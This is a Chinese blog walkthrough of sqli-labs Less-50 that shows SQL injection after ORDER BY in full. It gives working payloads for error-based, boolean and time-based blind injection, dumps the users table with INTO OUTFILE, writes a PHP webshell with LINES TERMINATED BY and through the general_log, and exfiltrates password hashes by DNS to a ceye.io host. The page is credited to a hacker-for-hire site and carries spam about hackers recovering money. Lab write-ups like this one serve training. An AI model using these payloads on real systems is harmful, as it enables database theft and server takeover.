当前位置:首页 > 网络安全 > 正文内容

从sqli-labs Less - 50 全面分析order by后注入

访客4年前 (2021-04-15)网络安全663

从sqli-labs Less - 50 全面分析order by后注入

参考文献:

国光 Less-38

lcamry Less - 46

DNSLog在MySQL注入中的实战

Dnslog在SQL注入中的实战

Less-50

请求方式注入类型拼接方式GET报错、布尔盲注、延时盲注、堆叠注入ORDER BY $id

$id=$_GET['sort']; $sql="SELECT * FROM users ORDER BY $id"; if (mysqli_multi_query($con1, $sql)) 输出查询信息 else print_r(mysqli_error($con1));

和Less-46相比,查询方式由mysql_query变成了mysqli_multi_query,因此支持堆叠注入,在注入方面会更加灵活。

order by不同于where后的注入点,不能使用union等进行注入。

SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr] ... [into_option] [FROM table_references [PARTITION partition_list]] [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [into_option] [FOR UPDATE | LOCK IN SHARE MODE] into_option: { INTO OUTFILE 'file_name' [CHARACTER SET charset_name] export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name] ... }

可以利用order by后的一些参数进行注入

比如

ASC | DESC LIMIT PROCEDURE INTO OUTFILE 'file_name' INTO DUMPFILE 'file_name'

查询语句为

SELECT * FROM users ORDER BY $id

order by后的数字可以作为一个注入点。也就是构造order by后的一个语句,让该语句的执行结果为一个数。该语句有三种形式

1.直接添加注入语句

?sort=(select ****)

2.利用rand()函数

?sort=rand(sql语句)

3.利用and

?sort=1 and (sql语句)

其中,sql语句可以利用报错注入和延时注入的方式。

验证方式:

升序和降序验证

# 升序排序 ?sort=1 asc # 降序排序 ?sort=1 desc

rand()验证

rand(true)和rand(false)的结果是不一样的

?sort=rand(true) ?sort=rand(false)

利用rand()函数可以构造出布尔和延时盲注的payload

此外rand()的结果一直都是随机的

?sort=rand()

延时验证

?sort=sleep(1) ?sort=(sleep(1)) ?sort=1 and sleep(1)

这几种方式均可以延时,延时的时间为(行数*1)秒

报错注入

and (报错注入)

?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) ?sort=0 and%20(updatexml(1,concat(0x5e24,(user()),0x5e24),1))

直接添加注入语句报错

?sort=(SELECT COUNT(*) FROM information_schema.COLUMNS GROUP BY CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND(0)*2)))

procedure analyse参数后注入

利用procedure analyse参数,也可执行报错注入。同时,在procedure analyse和order by之间可以存在limit参数,我们在实际应用中,往往也可能会存在limit后的注入,可以利用procedure analyse进行注入。

注意,procedure analyse只能在Linux下使用

?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1) ?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT+CONCAT_WS(':',username,password)+FROM+users limit 0,1))),1)

布尔盲注

数据库的第一位为s:

?sort=RAND(LEFT(database(),1)>'r') ?sort=RAND(LEFT(database(),1)>'s')

延时盲注

数据库第一个字母的ASCII码为115,即s

?sort=RAND(IF(ASCII(SUBSTR(database(),1,1))>114,1,sleep(1))) ?sort=RAND(IF(ASCII(SUBSTR(database(),1,1))>115,1,sleep(1))) ?sort=(SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

into outfile

将查询结果导入到文件中

?sort=1 INTO OUTFILE "C:/phpstudy_pro/WWW/less50.txt"

如果导入不成功的话,很可能是因为MySQL在当前Web目录下没有读写权限造成的。

访问验证是否有信息:

C:\Users\Nawkham>curl http://127.0.0.1/less50.txt 1 Dumb Dumb 2 Angelina I-kill-you 3 Dummy p@ssword 4 secure crappy 5 stupid stupidity 6 superman genious 7 batman mob!le 8 admin admin 9 admin1 admin1 10 admin2 admin2 11 admin3 admin3 12 dhakkan dumbo 14 admin4 admin4

利用导出文件getshell

可以将lines terminated by用于order by的情况来getshell

lines terminated by可以指定每一行之间的分隔符。

?sort=1 INTO OUTFILE "C:/phpstudy_pro/WWW/less50.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e

3c3f70687020706870696e666f28293b3f3e是<?php phpinfo();?>的十六进制编码

查看写入的文件内容:

1 Dumb Dumb<?php phpinfo();?>2 Angelina I-kill-you<?php phpinfo();?>3 Dummy p@ssword<?php phpinfo();?>4 secure crappy<?php phpinfo();?>5 stupid stupidity<?php phpinfo();?>6 superman genious<?php phpinfo();?>7 batman mob!le<?php phpinfo();?>8 admin admin<?php phpinfo();?>9 admin1 admin1<?php phpinfo();?>10 admin2 admin2<?php phpinfo();?>11 admin3 admin3<?php phpinfo();?>12 dhakkan dumbo<?php phpinfo();?>14 admin4 admin4<?php phpinfo();?>

用浏览器访问测试

堆叠注入

局限性:在Web中代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略。如果是在Windows平台下,可以使用DNSLog数据外带,或者开启日志Getshell的方式,来获得查询内容。

利用CEYE平台读取DNS查询日志,获得外带的数据

?sort=1;SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(password) FROM users LIMIT 1,1),'.b182oj.ceye.io\\abc'));

开启日志getshell

?sort=1;set global general_log="ON";set global general_log_file='C:/phpstudy_pro/WWW/1.php'; ?sort=1;select "<?php phpinfo();?>";

总结

如果页面会打印错误信息,则可以使用报错注入。在进行布尔盲注和延时盲注的时候,如果拼接方式有引号,只能使用and来进行报错和延时注入。如果MySQL有读写Web目录的权限,可以使用into oufile或lines terminated by这两种方法,将结果导入到一个可以访问的文件中。如果查询的SQL语句中使用了函数mysqli_multi_query,该函数可以执行多个由分号分隔的SQL语句,此时还可以进行堆叠注入。但是,堆叠注入有局限性,结果可能无法回显到前端。这时,如果是在Windows平台下,可以使用DNSLog数据外带,或者是开启日志Getshell的方式,来获取查询内容。


扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106755.html

分享给朋友:

“从sqli-labs Less - 50 全面分析order by后注入” 的相关文章

立秋是几月几日

说到立秋,大家可能还会觉得比较远,确实算一下也还有将近一个月的时间,大家知道今年的立秋是在什么时候吗,具体的时间是2020年8月7日09:06:03,星期五,农历六月十八,因此在这一天大家就可以吃很多的美食,那么接下来大家就随百思特小编一起了解看看~   立秋是几月...

洗米华小三(浅谈米花三笑的微博)

据长江网2021年11月26日23:49:22的最新消息,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,洗米华小三。猜测这是洗米华在暗中帮助着Mandy。挺想看他老婆小三都抛弃他的场面。 1.洗米华小三 m...

黑客追款出款成功再收费「24小时在线的黑客追款」

据公务员期刊网2021年10月14日18:37:49的最新发布,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,黑客追款出款成功再收费。可能没有机会接触到钱。那时候我就有想过退步。 一、黑客追回网赌40万 首先确保整个无前期费用黑客追款方案是最有效的,在做一件黑客...

【紧急+重要】勒索病毒解决方案!附:MS17-010补丁下载

  滚动更新:2017年5月13日16:57:22   游侠安全网(良心网站,站长先贴上注意事项和解决方法!防止你看本文的时候就被加密了!   1、本次共计是自动化攻击,利用了Windows的MS17-010。但苹果的MacOS用户不用得意,因为在昨晚之前,我这里得到的好几起勒索攻击案例都是针对...

干洗对衣物有害吗

干洗对衣物有害吗 干洗剂实际上就是有机溶剂,所以对衣服多少都有点危害,只不过高级的干洗剂对衣服损伤小一些而已。 随着人们工作的繁忙和生活节奏的加快,现代人更多地把换下的衣物送到洗衣店干洗,以保证衣服不变形和有更多的时间休闲娱乐,这本是一件提高生活品质的好事,但据最新的研究显示,干洗衣物对身...

尚村最新水貂皮毛价格,丹麦貂皮衣大概多少钱

样子单女款大概貂皮在8000,014-3-24河北尚村蓝狐皮价格,不过价格一般比较高的啊,这个就要看品牌的了,多看看,我要打印IE收藏放入公文包我要留言查看留言文章来源:中国皮草网添加,60公分6000左右,水貂皮大衣最新价格有木有,这个主要看质量了,水貂皮草大衣真假看皮面:如果是真毛。 元/张,5...

评论列表

鸠骨孚鲸
2年前 (2022-07-10)

的十六进制编码查看写入的文件内容:1 Dumb Dumb<?php phpinfo();?>2 Angelina I-kill-you&

瑰颈饮酎
2年前 (2022-07-10)

INTO OUTFILE "C:/phpstudy_pro/WWW/less50.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。